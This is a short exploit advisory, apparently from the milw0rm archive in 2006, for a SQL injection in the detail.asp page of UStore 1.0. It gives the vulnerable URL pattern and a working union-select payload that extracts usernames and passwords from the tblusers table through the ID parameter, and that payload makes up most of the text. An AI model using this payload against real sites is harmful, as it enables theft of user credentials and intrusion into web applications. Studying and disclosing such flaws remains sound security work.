19 lines
No EOL
551 B
Text
19 lines
No EOL
551 B
Text
*******************************************************************************
|
|
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Vendor: http://www.superfreaker.com/
|
|
*******************************************************************************
|
|
|
|
###http://[target]/[path]//detail.asp?ID=[SQL]
|
|
|
|
Example:
|
|
|
|
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-11-12] |